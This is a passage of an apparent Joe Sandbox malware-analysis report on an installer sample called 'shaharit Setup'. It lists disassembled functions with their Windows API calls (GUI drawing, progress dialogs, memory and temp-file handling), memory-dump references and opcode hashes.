                                                  Function 004041C1 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowLongA.USER32(?,000000EB), ref: 004041DE
                                                  • GetSysColor.USER32(00000000), ref: 004041FA
                                                  • SetTextColor.GDI32(?,00000000), ref: 00404206
                                                  • SetBkMode.GDI32(?,?), ref: 00404212
                                                  • GetSysColor.USER32(?), ref: 00404225
                                                  • SetBkColor.GDI32(?,?), ref: 00404235
                                                  • DeleteObject.GDI32(?), ref: 0040424F
                                                  • CreateBrushIndirect.GDI32(?), ref: 00404259
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
                                                  • Instruction ID: ef1bd211f687dc199c5e2a556594d88cbafbffeaa14e1023ebc7d04ec3d96a61
                                                  • Opcode Fuzzy Hash: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
                                                  • Instruction Fuzzy Hash: A32184B1504704ABC7219F78DD08B5BBBF8AF81714F04896DFAD5E26A0D734E944CB64
                                                  Function 00402CF9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000), ref: 00402D11
                                                  • GetTickCount.KERNEL32 ref: 00402D2F
                                                  • wsprintfA.USER32 ref: 00402D5D
                                                    • Part of subcall function 004051C0: lstrlenA.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
                                                    • Part of subcall function 004051C0: lstrlenA.KERNEL32(00402D70,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
                                                    • Part of subcall function 004051C0: lstrcatA.KERNEL32(Completed,00402D70,00402D70,Completed,00000000,00000000,00000000), ref: 0040521C
                                                    • Part of subcall function 004051C0: SetWindowTextA.USER32(Completed,Completed), ref: 0040522E
                                                    • Part of subcall function 004051C0: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
                                                    • Part of subcall function 004051C0: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
                                                    • Part of subcall function 004051C0: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C
                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402C61,00000000), ref: 00402D81
                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402D8F
                                                    • Part of subcall function 00402CDD: MulDiv.KERNEL32(00000000,00000064,00000E11), ref: 00402CF2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 722711167-2449383134
                                                  • Opcode ID: 49248589531ca63bd1f6eb350bee73914f18f328555d002f4c75c07f849debaa
                                                  • Instruction ID: 05ae4936d853d48bc68e56bc5a14e51e8e164cb381f888baae312624535d0e7d
                                                  • Opcode Fuzzy Hash: 49248589531ca63bd1f6eb350bee73914f18f328555d002f4c75c07f849debaa
                                                  • Instruction Fuzzy Hash: 3601D630901620EBD722AB60BF0CEDE7A78EF48701B44003BF555B51E4CBB84C41CA9E
                                                  Function 00404A8B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AA6
                                                  • GetMessagePos.USER32 ref: 00404AAE
                                                  • ScreenToClient.USER32(?,?), ref: 00404AC8
                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404ADA
                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B00
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                  • Instruction ID: d6f0acc73841e927dc0e8d5cbc3229ede44acf808998aa5f41192725d6cd764a
                                                  • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                  • Instruction Fuzzy Hash: 03019275900219BADB00DB95CD81BFFBBBCAF45711F10012BBA10B61C0C7B495018F94
                                                  Function 00402C61 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C7C
                                                  • wsprintfA.USER32 ref: 00402CB0
                                                  • SetWindowTextA.USER32(?,?), ref: 00402CC0
                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CD2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                  • API String ID: 1451636040-1158693248
                                                  • Opcode ID: fd6d30a01278415fece07758d049025ae65b55165fa63b5b41d509ea3c6516ac
                                                  • Instruction ID: dd36d9f71d3f98b31449e9fd5fd6fbb92ab2983ffa1af0ce52afe90c4e52f268
                                                  • Opcode Fuzzy Hash: fd6d30a01278415fece07758d049025ae65b55165fa63b5b41d509ea3c6516ac
                                                  • Instruction Fuzzy Hash: B6F03C7150020CFBEF209F61CE0ABAE7769EB44344F00803AFA16B52D0DBB999559F99
                                                  Function 00402736 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040278A
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027A6
                                                  • GlobalFree.KERNEL32(?), ref: 004027E5
                                                  • GlobalFree.KERNEL32(00000000), ref: 004027F8
                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402810
                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402824
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: 6c7dcdf8261c9d786bb24efcf90e0f1d33b45d541b425cde03fb6c43c6f2b2c7
                                                  • Instruction ID: 2027d9f4b10c536beff5d97c30926d1382b99fb2686dd4663458e7dd77d5dad7
                                                  • Opcode Fuzzy Hash: 6c7dcdf8261c9d786bb24efcf90e0f1d33b45d541b425cde03fb6c43c6f2b2c7
                                                  • Instruction Fuzzy Hash: C5219C71800128BBDF216FA5DE49DAE7A79EF05324F14423EF524762E1CA794D418FA8
                                                  Function 00404981 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenA.KERNEL32(shaharit Setup: Completed,shaharit Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040489C,000000DF,00000000,00000400,?), ref: 00404A1F
                                                  • wsprintfA.USER32 ref: 00404A27
                                                  • SetDlgItemTextA.USER32(?,shaharit Setup: Completed), ref: 00404A3A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s$shaharit Setup: Completed
                                                  • API String ID: 3540041739-482455319
                                                  • Opcode ID: 1956ebf24d5e1f55d94ce1980efd0233ee95868cdb52b5f3f7c77d6cead7fe34
                                                  • Instruction ID: 454b38ceac9876f8861c3790537a611104b372144c9fccdb064e9295d2f1ba63
                                                  • Opcode Fuzzy Hash: 1956ebf24d5e1f55d94ce1980efd0233ee95868cdb52b5f3f7c77d6cead7fe34
                                                  • Instruction Fuzzy Hash: 2111E773A0412837DB0066799C45EAF329CDB85374F254637FA26F31D1EA78CC1242E9
                                                  Function 00401D95 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401D98
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401DCB
                                                  • CreateFontIndirectA.GDI32(0040B808), ref: 00401E1A
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID:
                                                  • API String ID: 3808545654-0
                                                  • Opcode ID: db451da96fda065fe5f02a6a41f4c9c1ff559c50a342c71b5ed450c678e34272
                                                  • Instruction ID: bb5471ef097cc8c5e92714fe4b65473af6cf7b7baf5f4d2141323caa5fcdcc79
                                                  • Opcode Fuzzy Hash: db451da96fda065fe5f02a6a41f4c9c1ff559c50a342c71b5ed450c678e34272
                                                  • Instruction Fuzzy Hash: D4014C72944240AFE7006BB5AE5AA997FE8DB55305F10C839F241BA2F2CB7805458FAD
                                                  Function 00401D3B Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?), ref: 00401D3F
                                                  • GetClientRect.USER32(00000000,?), ref: 00401D4C
                                                  • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
                                                  • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
                                                  • DeleteObject.GDI32(00000000), ref: 00401D8A
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: f12035c4ff3cde1630f40445c8b20379daacdfe3928eb5981c26d31c1baae9d9
                                                  • Instruction ID: 074f51ed6dd20aae2d42350fdade0312ac008d0ce280de7d9e26dccf07732080
                                                  • Opcode Fuzzy Hash: f12035c4ff3cde1630f40445c8b20379daacdfe3928eb5981c26d31c1baae9d9
                                                  • Instruction Fuzzy Hash: 62F0FFB2600515AFDB00EBA4DE88DAFB7BCFB44301B04447AF645F2191CB748D018B38
                                                  Function 00401C04 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
                                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: 61d668203e925d2b626f83b6d528d825a590e8d0b5f9acd222ce781ec0ff5e12
                                                  • Instruction ID: aed907c05dc833253b389eb1df77c6bfbb772c9e61476b09ce63ef5510084725
                                                  • Opcode Fuzzy Hash: 61d668203e925d2b626f83b6d528d825a590e8d0b5f9acd222ce781ec0ff5e12
                                                  • Instruction Fuzzy Hash: 46218F71A44209AEEB15DFA5D946AED7BB0EF84304F14803EF505F61D1DA7889408F28
                                                  Function 00405A31 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004032FA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 00405A37
                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004032FA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 00405A40
                                                  • lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405A51
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A31
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-787714339
                                                  • Opcode ID: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                                                  • Instruction ID: 868260c831235620665dea70b18de3ff29fa680cd517475ab4f5cc36a8a73f00
                                                  • Opcode Fuzzy Hash: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                                                  • Instruction Fuzzy Hash: 79D023726015303AD1127F154C05DCF1A4C8F023507050077F200B7191CB3C0D514BFE
                                                  Function 00405ACA Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,?,00405B36,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,77273410,?,77272EE0,00405881,?,77273410,77272EE0,00000000), ref: 00405AD8
                                                  • CharNextA.USER32(00000000), ref: 00405ADD
                                                  • CharNextA.USER32(00000000), ref: 00405AF1
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nsa17F6.tmp, xrefs: 00405ACB
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: CharNext
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsa17F6.tmp
                                                  • API String ID: 3213498283-223556267
                                                  • Opcode ID: f542051b0c3854551ba559e3fab41aa2c74e08886ad556a296c0d482775cdbba
                                                  • Instruction ID: db937687bc36527a3f7147c44c8c9b1a0bf4ed848bee0725310acd997699ac17
                                                  • Opcode Fuzzy Hash: f542051b0c3854551ba559e3fab41aa2c74e08886ad556a296c0d482775cdbba
                                                  • Instruction Fuzzy Hash: D8F0C861B14F501AFB2262640C54B776BA8CB99350F04406BD540671C286BC6C404F6A
                                                  Function 004037F7 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CloseHandle.KERNEL32(000002AC,C:\Users\user\AppData\Local\Temp\,0040362E,?,?,00000006,00000008,0000000A), ref: 00403809
                                                  • CloseHandle.KERNEL32(000002BC,C:\Users\user\AppData\Local\Temp\,0040362E,?,?,00000006,00000008,0000000A), ref: 0040381D
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004037FC
                                                  • C:\Users\user\AppData\Local\Temp\nsa17F6.tmp, xrefs: 0040382D
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle
